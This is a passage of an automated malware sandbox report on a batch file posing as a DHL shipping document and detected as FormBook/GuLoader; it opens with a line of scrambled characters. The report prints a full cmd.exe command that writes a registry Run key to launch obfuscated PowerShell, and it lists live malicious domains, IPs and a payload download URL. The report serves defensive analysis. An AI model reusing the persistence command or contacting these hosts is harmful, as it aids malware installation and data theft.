strcwichukontr pr.i af,tg oby ufop tilrdatao hayt bleo ba.cteleo enelskri fo r=stop udd[ba.Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "scleroconjunctival" /t reg_expand_sz /d "%ulykkesfugles% -w 1 $cigaretetuiernes=(get-itemproperty -path 'hkcu:\indfindendes\').storborgernes;%ulykkesfugles% ($cigaretetuiernes)"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts1
            Windows Management Instrumentation            		1
            Scripting            		111
            Process Injection            		1
            Masquerading            		OS Credential Dumping111
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts21
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		1
            Registry Run Keys / Startup Folder            		1
            Modify Registry            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information            		Cached Domain Credentials112
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1473659 Sample: rDHL_PT56385793568927578365... Startdate: 15/07/2024 Architecture: WINDOWS Score: 100 38 tejarat-gram.com 2->38 40 econstramedia.com 2->40 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus detection for URL or domain 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 6 other signatures 2->52 11 cmd.exe 1 2->11         started        signatures3 process4 signatures5 58 Suspicious powershell command line found 11->58 60 Obfuscated command line found 11->60 62 Very long command line found 11->62 14 powershell.exe 14 23 11->14         started        18 conhost.exe 11->18         started        process6 dnsIp7 44 econstramedia.com 103.211.216.55, 443, 49730 PUBLIC-DOMAIN-REGISTRYUS Seychelles 14->44 64 Suspicious powershell command line found 14->64 66 Obfuscated command line found 14->66 68 Very long command line found 14->68 70 Found suspicious powershell code related to unpacking or dynamic code loading 14->70 20 powershell.exe 17 14->20         started        23 conhost.exe 14->23         started        25 cmd.exe 1 14->25         started        signatures8 process9 signatures10 54 Writes to foreign memory regions 20->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 20->56 27 wab.exe 2 7 20->27         started        30 cmd.exe 1 20->30         started        process11 dnsIp12 42 tejarat-gram.com 185.83.114.124, 443, 49737 HOSTIRAN-NETWORKIR Iran (ISLAMIC Republic Of) 27->42 32 cmd.exe 1 27->32         started        process13 process14 34 conhost.exe 32->34         started        36 reg.exe 1 1 32->36         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            rDHL_PT563857935689275783656385FV-GDS3535353.bat39%ReversingLabsScript.Trojan.Tnega

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://econstramedia.com/S0%Avira URL Cloudsafe
            https://econstramedia.com/Samsende.jpbXR0%Avira URL Cloudsafe
            https://econstramedia.com/Sam0%Avira URL Cloudsafe
            https://tejarat-gram.com/duWJGPYoYurORY170.bin100%Avira URL Cloudphishing
            https://econstramedia.com/Sa0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://econstramedia.com/Samse0%Avira URL Cloudsafe
            https://tejarat-gram.com/duWJGPYoYurORY170.binArbesKoneconstramedia.com/duWJGPYoYurORY170.bin100%Avira URL Cloudphishing
            https://econstramedia.com/Samsen0%Avira URL Cloudsafe
            https://econstramedia.com/0%Avira URL Cloudsafe
            https://econstramedia.com/Samsende.0%Avira URL Cloudsafe
            https://econstramedia.com/Samsende.jp0%Avira URL Cloudsafe
            https://econstramedia.com/Samsende.j0%Avira URL Cloudsafe
            http://econstramedia.com0%Avira URL Cloudsafe
            https://econstramedia.com/Samsend0%Avira URL Cloudsafe
            https://econstramedia.co0%Avira URL Cloudsafe
            https://econstramedia.com/Samsende.jpb0%Avira URL Cloudsafe
            https://econstramedia.c0%Avira URL Cloudsafe
            https://econstramedia.com/Sams0%Avira URL Cloudsafe
            https://econstramedia.com/Samsende0%Avira URL Cloudsafe
            https://econstramedia.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            tejarat-gram.com
            		185.83.114.124
            		truefalse
              		unknown
              econstramedia.com
              		103.211.216.55
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://tejarat-gram.com/duWJGPYoYurORY170.binfalse
                • Avira URL Cloud: phishing
                		unknown
                https://econstramedia.com/Samsende.jpbfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Spowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Samsepowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Samsende.jpbXRpowershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://go.micropowershell.exe, 00000002.00000002.2470375891.0000018D4B6E6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Sampowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Samsenpowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://tejarat-gram.com/duWJGPYoYurORY170.binArbesKoneconstramedia.com/duWJGPYoYurORY170.binwab.exe, 0000000A.00000002.2427597487.00000000243B0000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: phishing
                		unknown
                https://econstramedia.com/Sapowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Samsende.jppowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Samsende.powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2250127984.00000000043C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Samsendepowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.com/Samsende.jpowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.copowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Samsendpowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.com/Samspowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2470375891.0000018D4A471000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://econstramedia.compowershell.exe, 00000002.00000002.2470375891.0000018D4C214000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2470375891.0000018D4A471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2250127984.00000000043C1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://econstramedia.cpowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://econstramedia.compowershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2470375891.0000018D4BCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2470375891.0000018D4A69D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.83.114.124
                		tejarat-gram.comIran (ISLAMIC Republic Of)
                		59441HOSTIRAN-NETWORKIRfalse
                103.211.216.55
                		econstramedia.comSeychelles
                		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1473659
                Start date and time:2024-07-15 17:36:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 8s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:16
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:rDHL_PT563857935689275783656385FV-GDS3535353.bat
                Detection:MAL
                Classification:mal100.troj.evad.winBAT@18/9@2/2
                EGA Information:
                • Successful, ratio: 33.3%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 55
                • Number of non-executed functions: 48
                Cookbook Comments:
                • Found application associated with file extension: .bat

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 6716 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 6988 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: rDHL_PT563857935689275783656385FV-GDS3535353.bat

                Simulations

                Behavior and APIs

                TimeTypeDescription
                11:36:59API Interceptor131x Sleep call for process: powershell.exe modified
                11:38:09API Interceptor3x Sleep call for process: wab.exe modified
                16:37:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Scleroconjunctival %Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)
                16:37:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Scleroconjunctival %Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.83.114.124rFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                  103.211.216.55Drawing.exeGet hashmaliciousFormBookBrowse
                  • www.geetamalhotra.com/dq6e/?4h6ptXe=gCmk4CY41YBRNzkMIgpxHLDcJO/SeUa6sXhnC1aM++ZU7dPip1JMqQzcDB9b/rk3DAuPkc/TTQ==&w2=JBZ8
                  SOA #093732.exeGet hashmaliciousFormBookBrowse
                  • www.skyrosceramic.com/hme1/?jPw=XbK6B4uri6OvF71KFs1AoR4G+KEYZc4e7kHOoPVYJEZl8k4bIJ+n3z//pieZBY82GR+z&y2JhS=6lr41hZpgNXtF
                  documents-2112491607.xlsmGet hashmaliciousHidden Macro 4.0Browse
                  • kullumanalitours.com/ds/index.html
                  documents-1660683173.xlsmGet hashmaliciousHidden Macro 4.0Browse
                  • kullumanalitours.com/ds/index.html

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  econstramedia.comrFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                  • 103.211.216.55
                  BL1+2 DRAFT.cmdGet hashmaliciousFormBook, GuLoaderBrowse
                  • 103.211.216.55
                  BL1+2 DRAFT.cmdGet hashmaliciousGuLoaderBrowse
                  • 103.211.216.55
                  BL1+2DRAFT .cmdGet hashmaliciousFormBook, GuLoaderBrowse
                  • 103.211.216.55
                  tejarat-gram.comrFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                  • 185.83.114.124

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  PUBLIC-DOMAIN-REGISTRYUShttps://www.google.com.au/url?q=//www.google.co.nz/amp/s/ibuyhousekeys.com/document/findattached.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 208.91.199.118
                  Solicitud urgente de presupuestoNueva colaboraci#U00f3n pdf.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.91.199.223
                  http://www.veathika.com/cgi-bin/june.phpGet hashmaliciousHTMLPhisherBrowse
                  • 5.100.155.8
                  z1X3Z1ohoefF078ij.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.91.199.225
                  Products and Quote.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.91.199.225
                  https://mail.pfl.fyi/v1/messages/01909fdd-253c-74e4-a4d4-2d3080c42178/click?link_id=01909fdd-2577-78fa-9aa1-1363f665f21c&signature=ec89d906ae45cddf78ff2ac5ff90a7b4fb4098deGet hashmaliciousUnknownBrowse
                  • 208.91.199.181
                  Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.91.199.225
                  https://www.ijopjournal.comGet hashmaliciousUnknownBrowse
                  • 103.53.42.223
                  rFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                  • 103.211.216.55
                  z2PKRSEkM9edbE7Om.exeGet hashmaliciousAgentTeslaBrowse
                  • 208.91.199.223
                  HOSTIRAN-NETWORKIRrFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                  • 185.83.114.124
                  Shipping Docs.rdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 5.144.130.49
                  PAYMENT LIST.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 5.144.130.49
                  PO# CV-PO23002552.PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 5.144.130.49
                  PO# CV-PO23002552.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 5.144.130.35
                  Overdue Account.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • 5.144.130.35
                  https://hamrahansystem.com/4xe3cx/?PliaTEYmfRshGet hashmaliciousUnknownBrowse
                  • 45.138.134.33
                  Saham_Man.apkGet hashmaliciousIRATABrowse
                  • 5.144.130.58
                  Invoice-AWB-Document.doc.exeGet hashmaliciousAgentTeslaBrowse
                  • 5.144.130.32
                  https://wro16kdfl.lavinphysio.com/?qp=c2FuYWJyaWF0QGhpbGxzYm9yb3VnaGNvdW50eS5vcmc=Get hashmaliciousUnknownBrowse
                  • 5.144.130.49

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  3b5074b1b5d032e5620f69f9f700ff0estart1.batGet hashmaliciousUnknownBrowse
                  • 103.211.216.55
                  List of 20 computers and CPUs.batGet hashmaliciousUnknownBrowse
                  • 103.211.216.55
                  Health records + X- ray (2).batGet hashmaliciousUnknownBrowse
                  • 103.211.216.55
                  HealthInde.batGet hashmaliciousUnknownBrowse
                  • 103.211.216.55
                  http://24usred.com/0kqZRSGet hashmaliciousUnknownBrowse
                  • 103.211.216.55
                  https://bmryw2w4c4m3dw.inwise.net/Page_7-15-2024_1Get hashmaliciousPhisherBrowse
                  • 103.211.216.55
